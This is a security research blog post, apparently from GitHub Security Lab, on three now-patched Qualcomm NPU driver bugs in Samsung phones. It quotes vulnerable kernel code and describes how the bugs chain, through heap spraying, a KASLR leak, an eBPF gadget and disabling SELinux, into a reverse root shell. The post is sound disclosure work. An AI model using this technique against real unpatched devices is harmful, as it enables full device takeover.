skip to content
Back to GitHub.com
Home Bounties Research Advisories CodeQL Wall of Fame Get Involved Events
November 18, 2021

Fall of the machines: Exploiting the Qualcomm NPU (neural processing unit) kernel driver

Man Yue Mo

In this post, I’ll use three bugs in the Qualcomm NPU (neural processing unit) that I reported between November and December 2020. The main bug is a use-after-free (UAF) vulnerability (CVE-2021-1940/GHSL-2021-1029) that was fixed publicly in July, and the other two bugs are information leak bugs (CVE-2021-1968/GHSL-2021-1030 and CVE-2021-1969/GHSL-2021-1031) that were fixed publicly in October. These three bugs together form a very strong primitive that enables me to execute arbitrary code in the kernel from an untrusted app with ease. I’ll then use these primitives to create a reverse root shell with SELinux disabled on Samsung devices.

The Qualcomm NPU

The NPU is a coprocessor that is designed specifically for AI and machine learning tasks. When performing such tasks, which are often computationally intensive, models of neural networks as well as data can be sent to the NPU and processed there, which would both speed up the task by using the specially optimized NPU and also free up the CPU for other tasks to improve responses. As AI and machine learning become more and more important in mobile devices, many OEM chipsets now ship with an NPU, but with new technology comes new attack surfaces. Recently, there has been a lot of security research in the area of NPUs, most notably the vulnerabilities discovered in Samsung’s NPU driver by Ben Hawkes (P0-2073 and P0-2171) and the exploit by Brandon Azad (An iOS hacker tries Android), as well as Reversing and Exploiting Samsung’s Neural Processing Unit by Maxime Peterlin, which focuses on the reversing of the NPU firmware.

While this existing research focuses on the Samsung NPU and its corresponding kernel driver, not much research has been carried out for the Qualcomm NPU and its kernel driver. (The only other public vulnerability that I know of in this driver is CVE-2019-10621.) I hope that this post inspires others to research the Qualcomm NPU, as well as the NPUs of other vendors.

The attack surface

As the NPU kernel driver is introduced in kernel version 4.14, only handsets with kernel version 4.14 or above are affected by these vulnerabilities. This includes many mid- to high-end phones released after late 2019, for example, the Samsung Galaxy S10, S20, and A71. As Google’s Pixel devices have their own processing unit for AI and machine learning (the edge TPU), they do not use the NPU at all. In fact, not even the NPU firmware is shipped with Pixel devices, and the kernel driver requires root privilege to use, so none of these vulnerabilities affect Pixel devices.

This, however, is not the case for Samsung and possibly other devices. While Maxime Peterlin noted in Reversing and Exploiting Samsung’s Neural Processing Unit that access to the Samsung NPU driver is restricted after the disclosure by Google Project Zero, this is not the case for Samsung devices that use a Qualcomm chipset. As of the time of writing, the Qualcomm NPU driver can still be reached from the untrusted app domain, which means any app can access the driver. The vulnerabilities in this post, as well as the exploit, can be launched directly from a user app. In this post, I’ll assume Samsung devices with a Qualcomm chipset (which includes the S series handsets sold in the USA and China). The exploit developed in this post is tested on the Galaxy A71 device, but it should also work on S series devices that are running kernel 4.14 or above with suitable adjustments.

The kernel driver

The source code for the kernel driver is located at the directory drivers/media/platform/msm/npu in the kernel source tree. Apart from various tasks related to initialization and shutting down of the NPU, it is mostly responsible for sending RPC messages between the CPU (kernel) and the NPU, as well as allocating shared memory for accessing neural network models, data, and results. The documentation for the NPU is sparse, if not nonexistent, and it is not very clear which application, if any, actually uses it. On the Galaxy A71 tested, not even Qualcomm’s own implementation of the NNAPI (Neural Network API)(implemented as the service android.hardware.neuralnetworks@1.x-service-qti) seemed to be using the NPU. So what I describe in this section is a conclusion from educated guesses plus trial and error, and it may well not be how the NPU driver is meant to be used at all.

The driver can be interacted with by opening the file /dev/msm_npu. When the device driver file is opened, an npu_client object is created representing this file (which is a client of the NPU). This npu_client object is then released when all handles to this file are closed.

The ioctl calls for interacting with the kernel driver are listed in the npu_ioctl method. Some of the ioctl that are more relevant to this post are:

  1. npu_map_buf: Takes a Direct Memory Access (DMA) buffer allocated with the ION allocator and shares it with the NPU. This shared memory can then be used for loading neural network models onto the NPU.

  2. npu_unmap_buf: Unmaps the shared memory mapped with npu_map_buf from the NPU so that it can no longer access it.

  3. npu_load_network(_v2): Two different APIs that load a neural network model onto the NPU. The model data is stored in a shared memory area mapped using npu_map_buf. The details of the mapped buffer need to be supplied to this ioctl. This ioctl will perform some checks to ensure that the buffer is valid. The NPU kernel driver will also keep track of a list of neural networks that are loaded in the networks array of the global npu_host_ctx.

  4. npu_unload_network(_v2): Two different APIs that remove a neural network model from the NPU. This will also remove it from the networks array in the kernel driver.

  5. npu_exec_network(_v2): Two different APIs that execute the neural network model loaded from npu_load_network(_v2), presumably to carry out computation. Some checks are in place to make sure that the network provided is valid. Most of the parameters seem to be about the format of the neural network model and do not have any clear meaning to me.

These ioctl mostly perform some checks on the input parameters before repackaging them into RPC packets and send them using the npu_send_network_cmd method. This method then calls the npu_host_ipc_send_cmd method to post the RPC packet to an appropriate message queue:

static int npu_send_network_cmd(struct npu_device *npu_dev,
	struct npu_network *network, void *cmd_ptr, bool async)
{
    ...
	} else {
        ...
		ret = npu_host_ipc_send_cmd(npu_dev,
			IPC_QUEUE_APPS_EXEC, cmd_ptr);
		if (ret)
			network->cmd_pending = false;
	}

	return ret;
}

These messages will be picked up by the NPU to perform the appropriate action. Most commands are synchronous, meaning that the kernel driver will send the RPC, then wait for the NPU to complete the action and reply to it before the ioctl call completes. What is particularly interesting are the asynchronous npu_exec_network commands. By supplying a boolean parameter async in the ioctl parameter, this ioctl can be executed in the asynchronous mode and return to the user as soon as the RPC message is sent:

int32_t npu_host_exec_network(struct npu_client *client,
			struct msm_npu_exec_network_ioctl *exec_ioctl)
{
	bool async_ioctl = !!exec_ioctl->async;
    ...
	ret = npu_send_network_cmd(npu_dev, network, &exec_packet, async_ioctl);
    ...

	if (async_ioctl) {
		pr_debug("Async ioctl, return now\n");
		goto exec_done;
	}
    ...
	mutex_unlock(&host_ctx->lock);

	ret = wait_for_completion_interruptible_timeout(
		&network->cmd_done,
		(host_ctx->fw_dbg_mode & FW_DBG_MODE_INC_TIMEOUT) ?
		NW_DEBUG_TIMEOUT : NW_CMD_TIMEOUT);

	mutex_lock(&host_ctx->lock);
    ...
}

Users of the asynchronous mode can then use the npu_receive_event ioctl to retrieve the results of the computation from the NPU at a later time. Upon completion of a command, the NPU will send an RPC back to the CPU (kernel), which would then be processed by the app_msg_proc method.

The vulnerabilities

The vulnerabilities in this post are all related to the asynchronous mode in npu_exec_network. So let’s take a closer look at what happens when this ioctl is used. As I explained in the last section, the general steps involved in using the npu_exec_network ioctl seem to be the following:

  1. Map some shared memory region in the NPU using npu_map_buf and use it to store a neural network model.
  2. Load the neural network to the NPU using npu_load_network to load the neural network model to the NPU.
  3. Use npu_exec_network to execute the network with the async flag on.

The more interesting part is step two. As mentioned in the last section, when the network is loaded, it does not just get loaded onto the NPU. The kernel driver also keeps a record of the loaded network itself. This is done via the alloc_network method:

static struct npu_network *alloc_network(struct npu_host_ctx *ctx,
	struct npu_client *client)
{
	int32_t i;
	struct npu_network *network = ctx->networks;
	for (i = 0; i < MAX_LOADED_NETWORK; i++) {
		if (network->id == 0)
			break;
		network++;
	}
    ...
	network->client = client;
    ...
	return network;
}

Instead of being dynamically allocated, a network is actually just an entry in the statically allocated networks array of the global npu_host_ctx variable ctx. The ctx is shared by all users of the kernel driver so only a very limited number of networks can be loaded at a time. When an npu_network is allocated, it means that its data got set in the networks array and its id is returned to the user. The npu_network also stores the npu_client of the user that loaded it. This generally serves the following purposes:

  1. To distinguish between the users of the network so that each user can only access its own network. When getting a network via its id, the client field is checked to ensure that the user has the rights to access the network:

     static struct npu_network *get_network_by_hdl(struct npu_host_ctx *ctx,
         struct npu_client *client, uint32_t hdl)
     {
         int32_t i;
         struct npu_network *network = ctx->networks;
         ...
         for (i = 0; i < MAX_LOADED_NETWORK; i++) {
             if (network->network_hdl == hdl)
                 break;
             network++;
         }
         ...
         if (client && (client != network->client)) {     //<-------- Check that client owns the network
             pr_err("network %lld doesn't belong to this client\n",
                 network->id);
             return NULL;
         }
    
         network_get(network);
         return network;
     }
    
  2. When using the asynchronous ioctl calls, to identify the user that made the call when the NPU replied:

     static void app_msg_proc(struct npu_host_ctx *host_ctx, uint32_t *msg)
     {
         ...
         case NPU_IPC_MSG_EXECUTE_DONE:
         {
             ...
             network = get_network_by_hdl(host_ctx, NULL,
                 exe_rsp_pkt->network_hdl);
             ...
             if (!network->cmd_async) {
                 complete(&network->cmd_done);
             } else {
                 ...
                 if (npu_queue_event(network->client, &kevt))  //<------ queue the event to the client's event queue
                     pr_err("queue npu event failed\n");
             }
             network_put(network);
    

As the above code, which handles messages that come from the NPU, is run in a kernel worker, it relies on the npu_network whose id is included in the message to locate the user that originated the request, which it will then send as an event to the client’s event queue, prompting it to respond.

Of course, as npu_network is globally owned data, it is important that when the file is closed and npu_client is freed, appropriate clean up is carried out to remove it from npu_network to avoid use-after-free. This is carried out in npu_host_cleanup_networks. When npu_close is called, this function will be used to find the npu_network that stores this npu_client and tries to remove it using npu_host_unload_network:

void npu_host_cleanup_networks(struct npu_client *client)
{
    ...
	for (i = 0; i < MAX_LOADED_NETWORK; i++) {
		network = &host_ctx->networks[i];
		if (network->client == client) {
            ...
			npu_host_unload_network(client, &unload_req);
		}
	}
    ...
}

The method npu_host_unload_network will remove the client pointer from the npu_network in the path under free_network:

int32_t npu_host_unload_network(struct npu_client *client,
			struct msm_npu_unload_network_ioctl *unload)
{
    ...
free_network:
    ...
	free_network(host_ctx, client, network->id); //<------ zero out npu_network, which removes client
    ...
	return ret;
}

However, not all paths lead to free_network. Some may return early, although most of the error paths that return early are not reachable at this stage. One particular error path that may trigger an early return is the following:

	ret = npu_send_network_cmd(npu_dev, network, &unload_packet, false);
	if (ret) {
		pr_err("NPU_IPC_CMD_UNLOAD sent failed: %d\n", ret);
		/*
		 * If another command is running on this network,
		 * don't free_network now.
		 */
		if (ret == -EBUSY) {       //<----------- returns early and skip free_network
			pr_err("Network is running, retry later\n");
			network_put(network);
			mutex_unlock(&host_ctx->lock);
			return ret;
		}
		goto free_network;
	}

If there is an error when npu_send_network_cmd happens and the error is -EBUSY, then free_network will be skipped and client won’t be removed. The two interesting questions are:

  1. The obvious question: Is it possible to cause npu_send_network_cmd to return -EBUSY and trigger this path?
  2. The second question: Even if this path is triggered, how do I get access to the npu_network that holds the freed reference to npu_client? Once npu_client is freed, my file will be closed and I won’t be able to access the NPU driver using this npu_client. Because all accesses to npu_network are guarded by a check against the npu_client, unless I can make ioctl calls using the now freed client, I won’t be able to retrieve the npu_network that is holding the freed npu_client. However, to make ioctl calls using this freed client would require having access to the freed npu_client already.

It turns out that the answer to both these questions is the same: asynchronous execution.

Racing the CPU against the NPU

The answer to question one is actually very simple. By taking a look at npu_send_network_cmd, I saw that if the cmd_pending flag is set on the npu_network, then -EBUSY would be returned:

static int npu_send_network_cmd(struct npu_device *npu_dev,
	struct npu_network *network, void *cmd_ptr, bool async)
{
    ...
	} else if (network->cmd_pending) {
		pr_err("Another cmd is pending\n");
		ret = -EBUSY;

This is because cmd_pending is set when npu_send_network_cmd is called to send a command to the NPU and reset when the command is processed by the NPU:

static int npu_send_network_cmd(struct npu_device *npu_dev,
	struct npu_network *network, void *cmd_ptr, bool async)
{
    ...
	} else {
        ...
		network->cmd_async = async;
		network->cmd_ret_status = 0;
		network->cmd_pending = true;
		network->trans_id = atomic_read(&host_ctx->ipc_trans_id);
		ret = npu_host_ipc_send_cmd(npu_dev,
			IPC_QUEUE_APPS_EXEC, cmd_ptr);
   }
   ...
}
...
static void app_msg_proc(struct npu_host_ctx *host_ctx, uint32_t *msg)
{
    ...
	switch (msg_id) {
	case NPU_IPC_MSG_EXECUTE_DONE:
	{
        ...
		network->cmd_pending = false;

By issuing an async npu_exec_network command and then quickly closing the file /dev/msm_npu, the command may still be processed by the NPU and cmd_pending would remain true in this case.

As it turns out, this is also the solution to the second problem. When sending an npu_exec_network task in the async mode, there is no need for me to fetch the npu_network that contains the freed npu_client. I just need to wait and let the NPU do the bidding for me. When the NPU finishes the task and sends an RPC back to the CPU, the message will be processed by app_msg_proc:

static void app_msg_proc(struct npu_host_ctx *host_ctx, uint32_t *msg)
{
    ...
	case NPU_IPC_MSG_EXECUTE_V2_DONE:
	{
        ...
		if (network->cmd_async) {
            ...
			if (npu_queue_event(network->client, &kevt))
            ...

… which will pass network->client (which is now freed) to npu_queue_event. What’s more, npu_queue_event performs a wake_up_interruptible on the wait_queue_head_t wait of client:

static int npu_queue_event(struct npu_client *client, struct npu_kevent *evt)
{
    ...
	wake_up_interruptible(&client->wait);
	return 0;
}

… which will call a function stored in the entries of the queue wait, with a pointer to the entry as the first argument. So by replacing the npu_client with a fake object and having its wait queue point to an address with controlled data, I can execute any function with control of the first argument. What’s more, because it is executed on a kernel worker, it’ll be executed as root. This bug was assigned CVE-2021-1940.

An expensive one-character error

While the UAF bug itself can probably be exploited alone, it would be great if I could get a heap address to some data that I control where I can store my fake wait queue and entries. This would make it much easier for me to craft a fake object and greatly simplify the exploit. It turns out that there is another vulnerability that allows me to do just that.

When using the npu_exec_network_v2 API to execute a network, I can specify a stats_buf for the network, presumably to collect profiling and debugging information.

int32_t npu_host_exec_network_v2(struct npu_client *client,
	struct msm_npu_exec_network_ioctl_v2 *exec_ioctl,
	struct msm_npu_patch_buf_info *patch_buf_info)
{
    ...
	network->stats_buf_u = (void __user *)exec_ioctl->stats_buf_addr;
	network->stats_buf_size = exec_ioctl->stats_buf_size;

While trying to understand how the asynchronous ioctl works, I thought it might be useful to inspect the content of the stats_buf to see if there was any useful debugging information, so I decided to use this API and inspect the content of the stats_buf. However, the stats_buf only ever gave me some fixed length data that didn’t seem to make much sense. After some trials, I realized that I might actually be looking at memory addresses. So I took a look at the code that is responsible for returning stats_buf to the user. When the NPU sends a message to the CPU after the completion of npu_exec_network_v2, it’ll be handled by app_msg_proc:


static void app_msg_proc(struct npu_host_ctx *host_ctx, uint32_t *msg)
{
    ...
	case NPU_IPC_MSG_EXECUTE_V2_DONE:
	{
        ...
		if (network->cmd_async) {
            ...
			kevt.reserved[0] = (uint64_t)network->stats_buf;
			kevt.reserved[1] = (uint64_t)network->stats_buf_u;
			if (npu_queue_event(network->client, &kevt))

… which among other things will store the address of the stats_buf and a user space address as the target for copying the stats_buf back to the user space. These are stored in reserved in an event. When the user wants to read the contents of the stats_buf, they can use the npu_receive_event ioctl call, which then calls the npu_process_kevent function to process the events that are queued with npu_queue_event above.

static int npu_process_kevent(struct npu_kevent *kevt)
{
	int ret = 0;
	switch (kevt->evt.type) {
	case MSM_NPU_EVENT_TYPE_EXEC_V2_DONE:
		ret = copy_to_user((void __user *)kevt->reserved[1],
			(void *)&kevt->reserved[0],                      //<----------- 1.
			kevt->evt.u.exec_v2_done.stats_buf_size);
        ...

I have to admit, I missed the bug completely when I audited the code. In the above, the source for copy_to_user is meant to copy the content of the stats_buf back to the user space. As the address of the stats_buf is stored as kevt->reserved[0], the source of copy_to_user (indicated in one in the above snippet) should be kevt->reserved[0]. Instead, &kevt->reserved[0] is used, meaning that the content of kevt at the offset of reserved[0] is copied instead. This content, of course, is the addresses of the stats_buf and the user space address stats_buf_u. Moreover, as the size of the stats_buf can be much larger than the size of kevt, this will in fact lead to out-of-bounds read in copy_to_user. (It still cannot read the next object in the bucket due to hardened usercopy, but it can be used to read uninitialized memory.) This bug is assigned CVE-2021-1968.

I started out wanting to get some debugging data for my neural network and I ended up getting debugging data for the kernel, so I’m not complaining.

Size confusion

While looking through the implementation of app_msg_proc, I noticed another issue:

static void app_msg_proc(struct npu_host_ctx *host_ctx, uint32_t *msg)
{
    ...
	struct npu_kevent kevt;                         //<---------- 1.
    ...
	switch (msg_id) {
	case NPU_IPC_MSG_EXECUTE_V2_DONE:
	{
        ...
		if (network->cmd_async) {
			pr_debug("async cmd, queue event\n");
			kevt.evt.type = MSM_NPU_EVENT_TYPE_EXEC_V2_DONE;
			kevt.evt.u.exec_v2_done.network_hdl =
				exe_rsp_pkt->network_hdl;
			kevt.evt.u.exec_v2_done.exec_result =
				exe_rsp_pkt->header.status;
			kevt.evt.u.exec_v2_done.stats_buf_size = stats_size;
			kevt.reserved[0] = (uint64_t)network->stats_buf;
			kevt.reserved[1] = (uint64_t)network->stats_buf_u;
			if (npu_queue_event(network->client, &kevt))
				pr_err("queue npu event failed\n");

First, note that the npu_kevent object kevt used was not initialized. (See one in the above snippet) At first glance, this doesn’t seem to be a problem because, prior to use, various fields in kevt are initialized. So let’s check and see if all fields are initialized:

struct npu_kevent {
	struct list_head list;
	struct msm_npu_event evt;
	uint64_t reserved[4];
};

As you can see, reserved is an array of length 4, but only reserved[0] and reserved[1] are initialized. This turns out not to be a problem because when kevt is used by npu_receive_kevent, only evt, reserved[0], and reserved[1] are used:

static int npu_receive_event(struct npu_client *client,
	unsigned long arg)
{
	struct npu_kevent *kevt;
    ...
	if (list_empty(&client->evt_list)) {
      ...
	} else {
        ...
		npu_process_kevent(kevt);               //<------ only uses `reserved[0]` and `reserved[1]`
		ret = copy_to_user(argp, &kevt->evt,
			sizeof(struct msm_npu_event));
        ...
	}
	mutex_unlock(&client->list_lock);
	return ret;
}

So let’s check and see if all the fields in evt are initialized. The field evt is an msm_npu_event:

struct msm_npu_event {
	uint32_t type;
	union {
		struct msm_npu_event_execute_done exec_done;
		struct msm_npu_event_execute_v2_done exec_v2_done;
		struct msm_npu_event_ssr ssr;
		uint8_t data[128];
	} u;
	uint32_t reserved[4];
};

This turns out to contain a field u, which is a union. In app_msg_proc, msm_npu_event is interpreted as an msm_npu_event_execute_v2_done, which has these fields:

struct msm_npu_event_execute_v2_done {
	uint32_t network_hdl;
	int32_t exec_result;
	/* stats buf size filled */
	uint32_t stats_buf_size;
};

… which are indeed all initialized. The problem is, the size of a union is the size of its largest member, which in the case of msm_npu_event, is data[128], which is way bigger than the size of msm_npu_event_execute_v2_done. So there is going to be a lot of padding that is uninitialized. Even without this, reserved[4] is also completely uninitialized. What’s worse is that, as we’ve seen above, npu_receive_event will simply copy the whole msm_npu_event back to user space:

static int npu_receive_event(struct npu_client *client,
	unsigned long arg)
{
	struct npu_kevent *kevt;
    ...
	if (list_empty(&client->evt_list)) {
      ...
	} else {
        ...
		ret = copy_to_user(argp, &kevt->evt,
			sizeof(struct msm_npu_event));
        ...
	}
    ...
}

This means all the uninitialized data will be copied back to user space. This bug is assigned CVE-2021-1969.

Exploiting the bugs

These three bugs together give very strong primitives, both in terms of leaking kernel addresses to defeat kernel address space layout randomization (KASLR) and to execute arbitrary functions with controlled argument. The exploitation is fairly straightforward with these primitives. Since I don’t often have the luxury of having so many bugs that work together so well, I’ll indulge myself and use all three bugs in the exploit. The steps to gain arbitrary kernel code execution are as follows:

  1. Use CVE-2021-1968 to obtain the address of the stats_buf, and then reclaim it so that I can fill it with controlled data.
  2. Use CVE-2021-1969 to obtain an address of a kernel function to defeat KASLR.
  3. Use CVE-2021-1940 to execute arbitrary code with the knowledge obtained from steps one and two.

Getting address to controlled data

As explained in section “An expensive one character error”, by simply using the npu_exec_network_v2 ioctl call in async mode, the address of the stats_buf buffer will be copied to a user space buffer that I supplied when loading the network. The stats_buf is allocated via kzalloc as a size 0x4000 buffer, and it will be freed when the npu_network is unloaded via the npu_unload_network ioctl.

I should be able to do the following:

  1. Use npu_exec_network_v2 to trigger CVE-2021-1968 and obtain the address of the stats_buf of a npu_network that I specified.
  2. Unload the network using npu_unload_network to free the stats_buf.
  3. Use the sendmsg syscall to allocate a message buffer of size 0x4000 to reclaim the freed stats_buf. As allocations of this size are very rare, this will almost always allocate the message buffer at the address of the freed stats_buf. This means that the address of the stats_buf obtained in step one now points to the content of the message buffer, which I have complete control of.

The use of sendmsg in step three is a standard linux kernel heap spray technique that can be used to allocate arbitrary data of almost arbitrary size (with some fairly generous lower and upper bounds). I’ll be using this technique later in the post, but as the technique is very well-documented, I’ll not repeat the details here but refer the readers to this article. The key is that, with sendmsg, I’ll be able to allocate arbitrary data of almost any size using kmalloc.

These steps now allow me to place an arbitrary 0x4000 byte of data in an address that I know. That is much more than enough for my purpose.

Defeating KASLR

Next, I’ll use CVE-2021-1969 to obtain a kernel function address to defeat KASLR. Recall in section “Size confusion” that the uninitialized variable that gets copied back to the user space originated as the npu_kevent variable kevt in app_proc_msg:

static void app_msg_proc(struct npu_host_ctx *host_ctx, uint32_t *msg)
{
    ...
	struct npu_kevent kevt;
    ...
	switch (msg_id) {
	case NPU_IPC_MSG_EXECUTE_V2_DONE:
	{
        ...
		if (network->cmd_async) {
            ...
			if (npu_queue_event(network->client, &kevt))
            ...

So the uninitialized variable here is a stack variable. Note that, although Android 11 provided support for automatic variable initialization in the kernel, the kernel configuration CONFIG_INIT_STACK_ALL needs to be switched on to take benefit from it, and not all vendors have enabled this configuration. In particular, as of the time of writing, this is not enabled on all Samsung devices. (It seems that only devices running kernel 5.4, that is, S21, Z flip 3 etc. have this enabled.) So even in Android 11, I can still take full advantage of CVE-2021-1969 to leak kernel addresses via uninitialized variable.

After some testing, it appears that the address of host_irq_wq is located at the exact same offset within the uninitialized kevt variable. This gives me an easy and reliable way to retrieve its address and use it to defeat KASLR.

Gaining arbitrary code execution

To recap from the section “Racing the CPU against the NPU”, to exploit the use-after-free bug CVE-2021-1940, I’d need to win the following race:

figure

Boxes in blue indicate events that I initiate and control the timing of, whereas boxes in red indicate events that are initiated by the NPU that I cannot control. So to win the race, I need to free the npu_client and replace the freed client before the NPU completes the task. While it may be possible to create a computationally intensive task to delay the NPU, I wasn’t able to create any task on the NPU that would even get as far as being executed. However, it turns out that the race is fairly easy to win, even when the NPU is just going through the error path. Moreover, a failure to win the race would not normally have any adverse consequences, other than causing a network to be permanently loaded. While there are only 32 networks available, which means the race can fail at most 32 times before the available networks run out, in the device tested (A71), the race is usually won within a few trials, giving me plenty of margin.

So it remains to replace the freed npu_client with an appropriate fake object. Recall that npu_client is used in such a way that its wait queue gets put into wake_up_interruptible

static int npu_queue_event(struct npu_client *client, struct npu_kevent *evt)
{
    ...
	wake_up_interruptible(&client->wait);
	return 0;
}

… where wake_up_interruptible is a thin wrapper around __wake_up_common, passing &client->wait as wq_head to it, as well as setting the other arguments to some default values:

static int __wake_up_common(struct wait_queue_head *wq_head, unsigned int mode,
			int nr_exclusive, int wake_flags, void *key,
			wait_queue_entry_t *bookmark)
{
	wait_queue_entry_t *curr, *next;
	int cnt = 0;

	lockdep_assert_held(&wq_head->lock);

	if (bookmark && (bookmark->flags & WQ_FLAG_BOOKMARK)) {
        ...
	} else
		curr = list_first_entry(&wq_head->head, wait_queue_entry_t, entry);    //<----------- 1.

    ...
	list_for_each_entry_safe_from(curr, next, &wq_head->head, entry) {
        ...
		ret = curr->func(curr, mode, wake_flags, key);          //<------------ 2.
        ...
	}
    ...
}

In our case, the entries from the queue client->wait will be taken out in one above, and the function stored in func of the entry executed with the entry being the first argument (two in the above snippet).

So the crucial field to control in the npu_client is the queue wait, which is a doubly linked list of its entries. By replacing a freed npu_client with sendmsg heap spray so that the entries of its wait queue are pointers that point to the control data (stats_buf that I obtained in section “Getting address to controlled data”), I can then place an arbitrary function in the appropriate offset in stats_buf and have it executed. Moreover, as the function is executed with the curr entry in wait as its first argument, which, by construction, points to the stats_buf, I can control the data in the first argument curr as well.

figure

As I already got the address of host_irq_wq from CVE-2021-1969, I can use it to obtain the address of any kernel function. However, I will not be able to set func to the address of an arbitrary ROP gadget. The Realtime Kernel Protection (RKP) of Samsung KNOX has implemented a form of control flow integrity (CFI) check that would only allow function callsite to jump to the start of an actual function. This is called JOPP (jump-oriented programming prevention). Readers interested in the details can consult A Samsung RKP Compendium by Alexandre Adamski and KNOX Kernel Mitigation Byapsses by Dong-Hoon.

In order to gain arbitrary code execution, it would be good if I could use the __bpf_prog_run32 function that was used in An iOS hacker tries Android by Brandon Azad. As explained in that post, the function __bpf_prog_run32 can be used to invoke eBPF bytecode supplied through the second argument:

unsigned int __bpf_prog_run32(const void *ctx, const bpf_insn *insn)

… to gain arbitrary kernel code execution. However, since the invoked eBPF bytecode is passed as the second argument (insn), I need control of the second argument to use this gadget. This is not the case, as I only have control of the first argument (which points to the fake entry) here. So to use __bpf_prog_run32, I need another gadget that would transfer the control of the first argument to the second argument. Gadgets like this are actually not hard to find, as it is common to see code like the following in the Linux kernel, especially in device driver code:

void foo(struct type_a* input) {
  struct type_b* priv = input->private;
  if (priv->ops->func) {
    priv->ops->func(priv, priv->some_field1, ...);
  }
}

One such example is the ion_buffer_kmap_put (which is actually inlined, so the caller ion_dma_buf_vunmap is used in the actual exploit, but that’s a minor technical detail):

static void ion_buffer_kmap_put(struct ion_buffer *buffer)
{
    ...
	if (!buffer->kmap_cnt) {
		buffer->heap->ops->unmap_kernel(buffer->heap, buffer);   //<-------- 1.
		buffer->vaddr = NULL;
	}
}

With a fake buffer (first argument) under my control, this gives me control of both the function that is called in 1. above, as well as control of both the first and second arguments. So by using ion_buffer_kmap_put as func in my fake entry and using __bpf_prog_run32 as my buffer->heap->ops->unmap_kernel in the fake buffer, I’ll be able to run arbitrary eBPF code. What’s more, because this code is run from a kworker, it is run as root:

root          17989      2       0      0 worker_th+          0 I [kworker/3:2]
root          17998      2       0      0 worker_th+          0 I [kworker/1:0]
root          17999      2       0      0 worker_th+          0 I [kworker/2:1]
root          18179      2       0      0 worker_th+          0 I [kworker/u16:2]
root          18212      2       0      0 worker_th+          0 I [kworker/0:2]

… so in contrast to common belief, it is actually possible to execute arbitrary kernel code as root on a Samsung device, and it even comes for free, although there is still SELinux and seccomp restriction that would restrict even the root user’s privilege.

Bypassing SELinux and popping a reverse root shell

When SELinux is enabled, it can be run in either the permissive mode or the enforcing mode. When in permissive mode, it will only audit and log unauthorized accesses but will not block them. The mode in which SELinux is run in is controlled by the selinux_enforcing variable. If this variable is zero, then SELinux will be run in the permissive mode. Normally, variables that are critical to the security of the system will be protected by Kernel Data Protection (KDP), by marking them as read-only using the __kdp_ro or the __rkp_ro attribute. This attribute indicates that the variable is in a read-only page and its modification is guarded by hypervisor calls. However, to my surprise, on the firmware that I tested, as well as the source code of some S series devices, this variable does not seem to be protected:

//In security/selinux/hooks.c
#ifdef CONFIG_SECURITY_SELINUX_DEVELOP
static int selinux_enforcing_boot;
int selinux_enforcing;

The configuration CONFIG_SECURITY_SELINUX_DEVELOP is enabled in these devices. Judging from the kernel source code downloaded from Samsung, this seems to be the case for firmware as recent as June 2021 (from S21 source code), although newer versions of the firmware seem to have added protection to selinux_enforcing. In source code corresponding to more recent firmware (G981USQS2DUH2/G981USQS2DUI1 for the S20, which is roughly the September update), the selinux_enforcing variable is marked as __kdp_ro:

//In security/selinux/hooks.c
#ifdef CONFIG_SECURITY_SELINUX_DEVELOP
#if (defined CONFIG_KDP_CRED && defined CONFIG_SAMSUNG_PRODUCT_SHIP)
static int selinux_enforcing_boot __kdp_ro;
int selinux_enforcing __kdp_ro;

… and is now protected by KNOX. However, as the bug in this post was fixed in July 2021, I can simply overwrite selinux_enforcing to zero to disable SELinux.

After SELinux is disabled, the call_usermodehelper function can be called via the kernel code execution primitive to spawn a reverse shell. As the code is called from the kworker, the shell will also have root user ID. This, together with SELinux disabled, gives me full root privilege on the device.

The exploit can be found here with some setup notes.

Conclusions

In this post, I’ve looked at some vulnerabilities in Qualcomm’s NPU driver. While the Samsung’s NPU driver and firmware are well researched, research on the NPU in Qualcomm remains sparse, yet it can be attacked from the untrusted app sandbox directly on many devices. The main bug used in this post is a use-after-free that resulted in a race between the NPU and the CPU, where the NPU is trying to access resources that the CPU had released. This is a rather unconventional race condition in the kernel. As the usual techniques to prevent race conditions, such as mutex, only apply when resources are shared within the same processor, extra care must be taken when handling resources that are shared between different processors. Another interesting feature about this bug is that, because the use-after-free is executed by a kworker, this bug allows kernel code to be executed in the root context. Moreover, because the selinux_enforcing variable was not protected, I was able to disable SELinux also. This is an interesting shortcut to bypass the Kernel Data Protection (KDP) on Samsung devices that prevents process from overwriting its credentials to become root by protecting process credentials.

While it is not uncommon to have vulnerabilities in sufficiently complex codebases, and the vulnerabilities detailed in this post are not the most straightforward to spot, the existence of a bug like CVE-2021-1968, which would have been discovered, at the very least, as a functional bug by just running the relevant ioctl in async mode, shows that the NPU driver is perhaps not very well tested. This, together with the long time it took for the vulnerabilities to be fixed (CVE-2021-1940 took about seven months for the fix to be public, and CVE-2021-1968 and CVE-2021-1969 both took about ten months, and this is not an isolated instance, a previous use-after-free vulnerability, CVE-2019-10621, took about eight months to fix) is a very worrying sign. As Android relies heavily on application sandboxing, a long patch time for vulnerabilities increases the window where vulnerabilities can co-exist and greatly reduces the efficiency of application sandboxing. I’d suggest that original equipment manufacturers (OEMs) carefully review the use of the NPU driver and place appropriate restrictions on its access.